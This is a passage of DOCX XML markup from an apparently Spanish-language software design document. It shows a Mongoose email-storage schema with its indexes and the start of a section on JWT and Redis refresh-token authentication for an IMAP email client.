          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongoose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'mongoose'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> AttachmentRefSchema </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongoose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  filename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contentType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seaweedFid</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { _id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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> EmailSchema </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongoose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongoose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Types</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ObjectId</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index</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accountId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongoose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Types</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ObjectId</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index</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folderId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongoose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Types</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ObjectId</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index</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NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// IMAP metadata</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  uid</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Number</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messageId</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index</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threadId</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index</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NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Headers</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  subject</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from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [{ name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address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [{ name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address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  cc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [{ name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address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  bcc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [{ name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address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  replyTo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [{ name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address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  date</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index</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NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Content</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  bodyText</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bodyHtml</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bodyHtmlSanitized</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headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongoose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Types</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Mixed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// State</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  flags</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String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</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 }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  isRead</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Boolean</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isStarred</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Boolean</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BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Attachments</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  attachments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [AttachmentRefSchema]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  hasAttachments</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Boolean</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Indexing</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  indexedAt</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BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">now</w:t>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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  timestamps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r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Índice compuesto ESR: Equality → Sort → Range</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">EmailSchema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({ accountId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folderId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date</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uid</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EmailSchema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({ accountId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threadId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date</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EmailSchema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({ userId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isRead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date</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Email </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongoose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">model</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Email'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> EmailSchema)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="181"/>
    <w:bookmarkStart w:id="182" w:name="auth-jwt-redis-refresh-tokens"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.2.3 Auth: JWT + Redis Refresh Tokens</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El patrón BFF (Backend for Frontend) almacena el access token en memoria del frontend y el refresh token en una cookie HttpOnly. Las credenciales IMAP se encriptan con AES-256-GCM antes de almacenarse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[157]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[160]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/api/src/services/auth.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> crypto </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'crypto'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> bcrypt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'bcrypt'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { User } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../models/User.js'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { redis } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
